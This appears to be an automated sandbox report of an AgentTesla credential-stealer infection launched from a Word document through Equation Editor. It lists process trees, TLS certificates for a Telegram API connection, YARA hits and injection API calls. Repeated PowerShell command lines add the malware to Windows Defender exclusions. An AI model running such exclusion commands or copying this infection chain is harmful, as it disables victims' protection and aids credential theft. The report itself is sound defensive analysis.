                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                          OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034
                                                                                          May 27, 2021 21:36:03.955586910 CEST149.154.167.220443192.168.2.2249185CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                          OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034

                                                                                          Code Manipulations

                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          Analysis Process: WINWORD.EXE PID: 1976 Parent PID: 584

                                                                                          General

                                                                                          Start time:21:32:34
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                          Imagebase:0x13f450000
                                                                                          File size:1424032 bytes
                                                                                          MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: EQNEDT32.EXE PID: 1984 Parent PID: 584

                                                                                          General

                                                                                          Start time:21:32:35
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                          Imagebase:0x400000
                                                                                          File size:543304 bytes
                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: srt.exe PID: 1696 Parent PID: 1984

                                                                                          General

                                                                                          Start time:21:32:37
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Users\user\AppData\Roaming\srt.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\AppData\Roaming\srt.exe
                                                                                          Imagebase:0xd70000
                                                                                          File size:3777536 bytes
                                                                                          MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          Reputation:low

                                                                                          Chronological Activities

                                                                                          Analysis Process: powershell.exe PID: 2584 Parent PID: 1696

                                                                                          General

                                                                                          Start time:21:32:41
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                                                                                          Imagebase:0x226e0000
                                                                                          File size:452608 bytes
                                                                                          MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: powershell.exe PID: 2408 Parent PID: 1696

                                                                                          General

                                                                                          Start time:21:32:42
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                                                                                          Imagebase:0x226e0000
                                                                                          File size:452608 bytes
                                                                                          MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: powershell.exe PID: 2888 Parent PID: 1696

                                                                                          General

                                                                                          Start time:21:32:45
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                                                                                          Imagebase:0x226e0000
                                                                                          File size:452608 bytes
                                                                                          MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: powershell.exe PID: 2928 Parent PID: 1696

                                                                                          General

                                                                                          Start time:21:32:46
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                                                                                          Imagebase:0x226e0000
                                                                                          File size:452608 bytes
                                                                                          MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe PID: 2900 Parent PID: 1696

                                                                                          General

                                                                                          Start time:21:32:48
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe'
                                                                                          Imagebase:0x900000
                                                                                          File size:3777536 bytes
                                                                                          MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2199429971.0000000004283000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2199429971.0000000004283000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          Reputation:low

                                                                                          Chronological Activities

                                                                                          Analysis Process: powershell.exe PID: 3060 Parent PID: 1696

                                                                                          General

                                                                                          Start time:21:32:53
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                                                                                          Imagebase:0x226e0000
                                                                                          File size:452608 bytes
                                                                                          MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: powershell.exe PID: 2260 Parent PID: 1696

                                                                                          General

                                                                                          Start time:21:32:54
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                                                                                          Imagebase:0x226e0000
                                                                                          File size:452608 bytes
                                                                                          MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: powershell.exe PID: 1428 Parent PID: 1696

                                                                                          General

                                                                                          Start time:21:32:54
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                                                                                          Imagebase:0x226e0000
                                                                                          File size:452608 bytes
                                                                                          MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe PID: 1888 Parent PID: 1388

                                                                                          General

                                                                                          Start time:21:32:57
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe'
                                                                                          Imagebase:0x900000
                                                                                          File size:3777536 bytes
                                                                                          MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.2223798583.0000000004123000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000002.2223798583.0000000004123000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:low

                                                                                          Chronological Activities

                                                                                          Analysis Process: powershell.exe PID: 1836 Parent PID: 2900

                                                                                          General

                                                                                          Start time:21:33:02
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                                                                                          Imagebase:0x226e0000
                                                                                          File size:452608 bytes
                                                                                          MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Reputation:high

                                                                                          Chronological Activities

                                                                                          Analysis Process: powershell.exe PID: 2360 Parent PID: 2900

                                                                                          General

                                                                                          Start time:21:33:02
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                                                                                          Imagebase:0x226e0000
                                                                                          File size:452608 bytes
                                                                                          MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET

                                                                                          Chronological Activities

                                                                                          Analysis Process: srt.exe PID: 3016 Parent PID: 1696

                                                                                          General

                                                                                          Start time:21:33:03
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Users\user\AppData\Roaming\srt.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\AppData\Roaming\srt.exe
                                                                                          Imagebase:0xd70000
                                                                                          File size:3777536 bytes
                                                                                          MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.2354156533.0000000002511000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.2354156533.0000000002511000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.2354462917.00000000025FB000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.2356782118.0000000002899000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.2356782118.0000000002899000.00000004.00000001.sdmp, Author: Joe Security

                                                                                          Chronological Activities

                                                                                          Analysis Process: powershell.exe PID: 2792 Parent PID: 2900

                                                                                          General

                                                                                          Start time:21:33:03
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                                                                                          Imagebase:0x226e0000
                                                                                          File size:452608 bytes
                                                                                          MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET

                                                                                          Chronological Activities

                                                                                          Analysis Process: powershell.exe PID: 2516 Parent PID: 2900

                                                                                          General

                                                                                          Start time:21:33:03
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                                                                                          Imagebase:0x226e0000
                                                                                          File size:452608 bytes
                                                                                          MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET

                                                                                          Chronological Activities

                                                                                          Analysis Process: svchost.exe PID: 2420 Parent PID: 1388

                                                                                          General

                                                                                          Start time:21:33:11
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe'
                                                                                          Imagebase:0xa00000
                                                                                          File size:3777536 bytes
                                                                                          MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.2249091795.0000000004273000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001D.00000002.2249091795.0000000004273000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Joe Sandbox ML

                                                                                          Chronological Activities

                                                                                          Analysis Process: powershell.exe PID: 2152 Parent PID: 1888

                                                                                          General

                                                                                          Start time:21:33:12
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                                                                                          Imagebase:0x226e0000
                                                                                          File size:452608 bytes
                                                                                          MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET

                                                                                          Chronological Activities

                                                                                          Analysis Process: 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe PID: 2940 Parent PID: 2900

                                                                                          General

                                                                                          Start time:21:33:13
                                                                                          Start date:27/05/2021
                                                                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                                                                                          Imagebase:0x900000
                                                                                          File size:3777536 bytes
                                                                                          MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.2352010780.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                          Chronological Activities

                                                                                          Disassembly

                                                                                          Code Analysis

                                                                                          Reset < >

                                                                                            Analysis Process: srt.exe PID: 1696 Parent PID: 1984 srt.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 002E0488, Relevance: 16.7, Strings: 13, Instructions: 429COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2151755031.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: fCl$fCl$fCl$fCl$fCl$fCl$fCl$fCl$fCl$fCl$fCl$fCl$fCl
                                                                                            • API String ID: 0-1904684503
                                                                                            • Opcode ID: 9b9f99765750fe6716864f693f6945dbc30ef54b442c2e9608b4d7842544c488
                                                                                            • Instruction ID: 17f53bf668d73c1067304229c527bff8ed130a95c5f9ae590fb8593f5de2b256
                                                                                            • Opcode Fuzzy Hash: 9b9f99765750fe6716864f693f6945dbc30ef54b442c2e9608b4d7842544c488
                                                                                            • Instruction Fuzzy Hash: 21E1F6387101154FDB08ABB4D851FBE72ABEBC8344F208839D506973A9CFB58D66DB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 002E0691, Relevance: 15.3, Strings: 12, Instructions: 276COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2151755031.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: fCl$fCl$fCl$fCl$fCl$fCl$fCl$fCl$fCl$fCl$fCl$fCl
                                                                                            • API String ID: 0-4202141601
                                                                                            • Opcode ID: d401751b04fad1746138bbc6ea83b18f1695dec0575b0de889cb8feeff434919
                                                                                            • Instruction ID: 2b4a50fb09026a0b705070c97695d83680f25545c6802980fc1aff7a5eacc7e4
                                                                                            • Opcode Fuzzy Hash: d401751b04fad1746138bbc6ea83b18f1695dec0575b0de889cb8feeff434919
                                                                                            • Instruction Fuzzy Hash: 6D91A3383101244FDB0DB7A4A812B7E619BE7C8740F208839D506977ADCFB68D6B9796
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 002E0B70, Relevance: .4, Instructions: 372COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2151755031.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 843cd07760aa58df4d74d09bdb0c9c18de125c3faa88453eb9dccc8927ce398e
                                                                                            • Instruction ID: afc6a5ec4a8333b79d12e231b9eb5ee887f2464ce68c12163f887d33736076bc
                                                                                            • Opcode Fuzzy Hash: 843cd07760aa58df4d74d09bdb0c9c18de125c3faa88453eb9dccc8927ce398e
                                                                                            • Instruction Fuzzy Hash: 2DE17D346502458FCB14AFB1E84CB9D77B2FF89305F114929E50A9B2B8DB7198DAEB40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 002E3B30, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 002E3BB6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2151755031.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID: I<
                                                                                            • API String ID: 983334009-1326291508
                                                                                            • Opcode ID: 21c5a2fbf54c76b9019f3da790f65c2ed161ee8748d27fd4a717127912a7570d
                                                                                            • Instruction ID: 8321878f03a2672682c472683028162be7e0df78ab72de8e5f544caf09068ba7
                                                                                            • Opcode Fuzzy Hash: 21c5a2fbf54c76b9019f3da790f65c2ed161ee8748d27fd4a717127912a7570d
                                                                                            • Instruction Fuzzy Hash: 2E215C71D102099FDB10CFAAC4847EEBBF5AF88318F54882ED85AA7240D7789A45CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 002E1888, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 002E18A8
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 002E18BA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2151755031.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: c2bf2951e6b0bc03fa36025754f32ec60d78e3345783a59519a9239aae591f53
                                                                                            • Instruction ID: a851e28bf8b356e9e44196884d880c7e4c98b5721ec9b2db1db7119b11749823
                                                                                            • Opcode Fuzzy Hash: c2bf2951e6b0bc03fa36025754f32ec60d78e3345783a59519a9239aae591f53
                                                                                            • Instruction Fuzzy Hash: C1E01A70D00208CF8744EFA8E84891A7BF4FB49300B2059AAC80DD3364E7305966DFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 002E4B58, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002E4D8E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2151755031.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: b9a94093541e7858b66da4553917faa4a2f4d39c93e730ade62a1da3509ea35c
                                                                                            • Instruction ID: 54e422cf09eb53f5c01090fa7b4a3a171d2f07217c1278f3aabe4dcf7be3a2cd
                                                                                            • Opcode Fuzzy Hash: b9a94093541e7858b66da4553917faa4a2f4d39c93e730ade62a1da3509ea35c
                                                                                            • Instruction Fuzzy Hash: DC918B71D10259CFDF10DFA5C881BEEBBB2BF48304F5485AAD809A7280DB749A95CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 002E45B9, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 002E4640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2151755031.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: 9c8b1a11af8bd2f1eba1379e55d69c15665fe5515d4e5fd60fd73a1ea1b5baad
                                                                                            • Instruction ID: a71d6027b9b88c7400aa1dbd8f34f0ea9305403f7dc9df28c69f9466e6341b5a
                                                                                            • Opcode Fuzzy Hash: 9c8b1a11af8bd2f1eba1379e55d69c15665fe5515d4e5fd60fd73a1ea1b5baad
                                                                                            • Instruction Fuzzy Hash: 22217A71C102499FDB10DFAAC8847EEBBF5BF48314F90882AD515A7240C7789554CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 002E42D0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 002E4360
                                                                                            Memory Dump Source
